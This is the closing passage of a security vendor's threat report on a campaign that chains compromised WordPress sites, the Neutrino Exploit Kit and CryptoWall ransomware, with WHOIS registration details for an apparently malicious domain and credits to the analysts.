Admin Name: Max Vlapet 
Admin Organization: N/A 
Admin Street: Mausoleum str, pl.13 
Admin City: Moscow 
Admin State/Province: Moscow 
Admin Postal Code: 123006 
Admin Country: RU 
Admin Phone: +7.4959826524 
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext: 
Admin Email: 
Tech ID: ALP_44867689 
Tech Name: Max Vlapet 
Tech Organization: N/A 
Tech Street: Mausoleum str, pl.13 
Tech City: Moscow 
Tech State/Province: Moscow 
Tech Postal Code: 123006 
Tech Country: RU 
Tech Phone: +7.4959826524 
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: 
Name Server: NS2.MOHGROUP.XYZ 
Name Server: NS1.MOHGROUP.XYZ 
DNSSEC: unsigned 
Billing ID: ALP_44867689 
Billing Name: Max Vlapet 
Billing Organization: N/A 
Billing Street: Mausoleum str, pl.13 
Billing City: Moscow 
Billing State/Province: Moscow 
Billing Postal Code: 123006 
Billing Country: RU 
Billing Phone: +7.4959826524 
Billing Phone Ext: 
Billing Fax: 
Billing Fax Ext: 
Billing Email: 
>>> Last update of WHOIS database: 2015-08-19T00:44:12.0Z <<< 

Unfortunately, very little information is available for the other TLDs in use. The backend IP serving new landing page URLs is registered to a company called 'VDS INSIDE' located in Ukraine.

A dump of the 700+ malicious domains and/or landing pages we've collected is on pastebin:


WordPress, being a widely popular and free Content Management System (CMS), remains one of the most attractive targets for cyber criminals. WordPress compromises are not new, but this campaign shows an interesting underground nexus starting with backdoored WordPress sites, a Neutrino Exploit Kit-controlled server, and the highly effective CryptoWall ransomware. This campaign also reconfirms that Neutrino Exploit Kit activity is on the rise and is still a major player in the exploit kit arena.

ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.


Special thanks to Dhruval Gandhi for profiling compromised WordPress sites

Write-up by: John Mancuso, Deepen Desai